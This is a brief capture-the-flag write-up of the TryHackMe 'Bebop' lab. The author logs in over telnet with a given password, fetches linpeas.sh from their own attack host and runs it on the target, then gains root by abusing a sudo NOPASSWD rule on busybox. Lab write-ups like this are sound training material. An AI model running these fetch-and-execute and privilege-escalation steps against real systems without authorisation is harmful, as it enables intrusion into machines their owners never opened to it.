THM: Bebop

Bebop

Who thought making a flying shell was a good idea?

This is Bebop from THM. It’s easy rated and is supposed to be about taking over a drone or something.

Ports

SSH and Telnet on port 23.

Telnet

We were given a password: pilot. Let’s try it?

root@kali:/opt/tryhackme/bebop# telnet 10.10.14.43 23
Trying 10.10.14.43...
Connected to 10.10.14.43.
Escape character is '^]'.
login: admin
Password for admin@freebsd:
login: pilot
Last login: Sat Oct  5 23:48:53 from cpc147224-roth10-2-0-cust456.17-1.cable.virginm.net
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Pretty easy. And in fact we can read both flags as pilot! Surely it’s not that easy?

Yes, it is.

But let’s get root. No wget or curl; the FreeBSD equivalent is fetch:

[pilot@freebsd /tmp]$ fetch http://10.9.10.123:8000/linpeas.sh
linpeas.sh                                             310 kB  164 kBps    02s
[pilot@freebsd /tmp]$ chmod +x linpeas.sh 
[pilot@freebsd /tmp]$ ./linpeas.sh 
 Starting linpeas. Caching Writable Folders...

Probably should’ve found this myself, but anyway:

[pilot@freebsd /tmp]$ sudo -l
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
[pilot@freebsd /tmp]$ sudo -u root /usr/local/bin/busybox sh
# id;hostname
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
freebsd

Easy feels like an understatement.